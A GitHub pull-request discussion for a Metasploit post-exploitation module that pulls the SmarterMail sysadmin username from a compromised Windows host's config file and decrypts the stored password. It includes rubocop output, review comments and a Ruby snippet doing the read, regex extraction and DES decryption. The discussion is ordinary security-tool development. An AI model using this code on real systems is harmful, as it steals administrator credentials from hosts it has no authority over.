Add Windows Gather SmarterMail Password Extraction post module #2934
Checking it with rubocop for compliance with the Ruby Style guide and some mods I have seen @jvazquez-r7 request:

    infidel02:Meterpreter-Scripts carlos$ rubocop -c rubocop-todo.yml post/windows/gather/smartermail.rb
    Inspecting 1 file
    C

    Offences:

    post/windows/gather/smartermail.rb:1:1: C: Missing utf-8 encoding comment.
    ##
    ^
    post/windows/gather/smartermail.rb:14:22: C: Surrounding space missing in default value assignment.
    def initialize(info={})
    ^
    post/windows/gather/smartermail.rb:15:11: C: Space inside parentheses detected.
    super( update_info( info,
    ^
    post/windows/gather/smartermail.rb:15:24: C: Space inside parentheses detected.
    super( update_info( info,
    ^
    post/windows/gather/smartermail.rb:16:9: C: Align the parameters of a method call if they span more than one line.
    'Name' => 'Windows Gather SmarterMail Password Extraction',
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    post/windows/gather/smartermail.rb:31:14: C: Space inside square brackets detected.
    [ 'URL', 'http://www.gironsec.com/blog/tag/cracking-smartermail/']
    ^
    post/windows/gather/smartermail.rb:33:29: C: Space inside square brackets detected.
    'Platform' => [ 'win' ],
    ^
    post/windows/gather/smartermail.rb:33:35: C: Space inside square brackets detected.
    'Platform' => [ 'win' ],
    ^
    post/windows/gather/smartermail.rb:34:29: C: Space inside square brackets detected.
    'SessionTypes' => [ 'meterpreter' ]
    ^
    post/windows/gather/smartermail.rb:34:43: C: Space inside square brackets detected.
    'SessionTypes' => [ 'meterpreter' ]
    ^
    post/windows/gather/smartermail.rb:36:1: C: Extra empty line detected at body end.
    post/windows/gather/smartermail.rb:42:19: C: Use def with parentheses when there are parameters.
    def decrypt_des encrypted
    ^^^^^^^^^
    post/windows/gather/smartermail.rb:48:5: C: Redundant `return` detected.
    return decipher.update(encrypted) + decipher.final
    ^^^^^^
    post/windows/gather/smartermail.rb:55:41: C: Prefer single-quoted strings when you don't need string interpolation or special symbols.
    drive = session.fs.file.expand_path("%SystemDrive%")
    ^^^^^^^^^^^^^^^
    post/windows/gather/smartermail.rb:83:20: C: Avoid the use of Perl-style backrefs.
    @username = "#{$1}" if data =~ /(.+)<\/sysAdminUserName>/
    ^^
    post/windows/gather/smartermail.rb:84:56: C: Avoid the use of Perl-style backrefs.
    @password = decrypt_des(Rex::Text.decode_base64("#{$1}")) if data =~ /(.+)<\/sysAdminPassword>/
    ^^
    post/windows/gather/smartermail.rb:84:101: C: Line is too long. [117/100]
    @password = decrypt_des(Rex::Text.decode_base64("#{$1}")) if data =~ /(.+)<\/sysAdminPassword>/
    ^^^^^^^^^^^^^^^^^
    post/windows/gather/smartermail.rb:93:24: C: Prefer single-quoted strings when you don't need string interpolation or special symbols.
    if session.type != "meterpreter"
    ^^^^^^^^^^^^^
    post/windows/gather/smartermail.rb:94:101: C: Line is too long. [101/100]
    print_error "#{@host} (#{@comp}) - Only meterpreter sessions are supported by this post module"
    ^
    post/windows/gather/smartermail.rb:115:101: C: Line is too long. [107/100]
    print_good "#{@host} (#{@comp}) - Found credentials. Username: '#{@username}' Password: '#{@password}'"
    ^^^^^^^
    post/windows/gather/smartermail.rb:124:3: C: Source files should end with a newline (\n).
    end
    ^

    1 file inspected, 21 offences detected
# | ||
# Retrieve username and decrypt encrypted password string from the config file | ||
# | ||
def get_smartermail_creds(path) |
You are using Class variables, I believe they should be avoided, try modifying the method to return a hash maybe with the values and check the returned values.
+ def get_smartermail_creds(path) + vprint_status "#{@host} (#{@comp}) - Retrieving SmarterMail sysadmin password" + begin + data = read_file("#{path}") || '' + rescue Rex::Post::Meterpreter::RequestError => e + print_error "#{@host} (#{@comp}) - Failed to download #{path} - #{e}" + return + end + if data.nil? + print_error "#{@host} (#{@comp}) - Configuration file is empty." + return + end + @username = "#{$1}" if data =~ /(.+)<\/sysAdminUserName>/ + @password = decrypt_des(Rex::Text.decode_base64("#{$1}")) if data =~ /(.+)<\/sysAdminPassword>/ + end
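Review bot: The `if data.nil?` check can never be true, because `data = read_file("#{path}") || ''` has already turned a nil result into an empty string, so an empty config file skips the "Configuration file is empty." message and falls through to the regex matches. Test `data.empty?` instead, or drop the `|| ''`. The two trailing-`if` assignments also depend on the `$1` global and leave `@username` and `@password` untouched when a match fails, so the caller cannot tell a missing element from a successful parse; capture with `data.match(...)` and return the pair explicitly. The `decrypt_des(Rex::Text.decode_base64(...))` call sits outside the `begin`/`rescue`, so any exception it raises on a malformed value is not handled here. Finally, `"#{path}"` is a redundant interpolation; pass `path` directly.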
Yeah makes sense. I was just being lazy. I'll change it to a hash.
Link to rubocop https://github.com/bbatsov/rubocop and the yml file can be found here for reference https://www.dropbox.com/s/9pbuy35ggodus1v/rubocop-jv-style.yml
Made suggested changes in commit 62dca11:
I'll be processing this before Monday comes, thanks.
Made some changes to make sure it supports shell sessions. Will be merged in a bit. Demos (for both shell & meterpreter session types):
Add Windows Gather SmarterMail Password Extraction post module.
Homepage: http://www.smartertools.com/smartermail/mail-server-software.aspx
Source: http://www.smartertools.com/smartermail/mail-server-download.aspx
Tested on: SmarterMail versions 10.7.4842 and 11.7.5136 (Windows 7)
Example Output
Example Verbose Output